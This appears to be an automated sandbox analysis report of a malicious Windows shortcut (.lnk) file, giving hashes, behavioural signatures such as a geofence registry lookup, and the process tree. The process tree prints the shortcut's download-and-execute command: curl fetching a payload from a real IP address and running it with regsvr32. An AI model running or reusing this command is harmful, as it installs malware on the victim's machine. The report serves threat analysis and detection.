Analysis
-
max time kernel
53s -
max time network
58s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
23-06-2022 15:17
Static task
static1
Behavioral task
behavioral1
Sample
DocumentsFolder_35334058_060139.lnk
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
DocumentsFolder_35334058_060139.lnk
Resource
win10v2004-20220414-en
General
-
Target
DocumentsFolder_35334058_060139.lnk
-
Size
1KB
-
MD5
2d3770c3daa570fa21b712f9dcc5da92
-
SHA1
291b441bd68939665764e62a9cfe5937d7a89869
-
SHA256
880798e380f7d1159c2d1486aa2458b218876d60607ad5f2f3a812a77ac7ad74
-
SHA512
aa91edc8e8cf82b7beaa4f5557be8e842c1185ab43d94dc25c3be96ea134097e5dbb3341d34d9e2830c13cbdd6d2aa1e6f3e138d1568dd070fa42bbe0def3862
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 1960 wrote to memory of 4204 1960 cmd.exe cmd.exe PID 1960 wrote to memory of 4204 1960 cmd.exe cmd.exe PID 4204 wrote to memory of 4056 4204 cmd.exe curl.exe PID 4204 wrote to memory of 4056 4204 cmd.exe curl.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\DocumentsFolder_35334058_060139.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /q /c curl -o C:\Users\Admin\AppData\Local\Temp\1.jpg -O http://194.36.191.243/717510.dat&®svr32 C:\Users\Admin\AppData\Local\Temp\1.jpg2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl -o C:\Users\Admin\AppData\Local\Temp\1.jpg -O http://194.36.191.243/717510.dat3⤵